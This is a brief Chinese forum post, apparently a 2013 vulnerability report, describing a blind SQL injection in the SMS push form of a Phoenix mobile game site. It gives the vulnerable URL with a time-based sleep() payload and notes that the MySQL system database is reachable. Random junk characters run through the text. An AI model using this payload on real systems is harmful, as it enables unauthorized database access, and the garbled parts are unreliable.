简要描述:
3 R9 J8 S' a; R5 @4 D' \凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
5 p8 W' N' x* |3 p
9 H! u. o7 H. v$ ?详细说明:
0 E8 V! k% M# |7 b- c, O( L2 f5 J存在SQL盲注url:4 ?' [ ^0 o E& x! v0 d
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=10 z! l, T7 `% ^! R5 `3 R
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
2 _3 l6 M; Q8 ~$ c. K; |) o" whttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png3 x r' s+ E; l1 I+ D
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg7 o2 u( J4 N1 Z8 ~: H2 {
: u0 ^7 J% z1 k' ?5 O# N能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对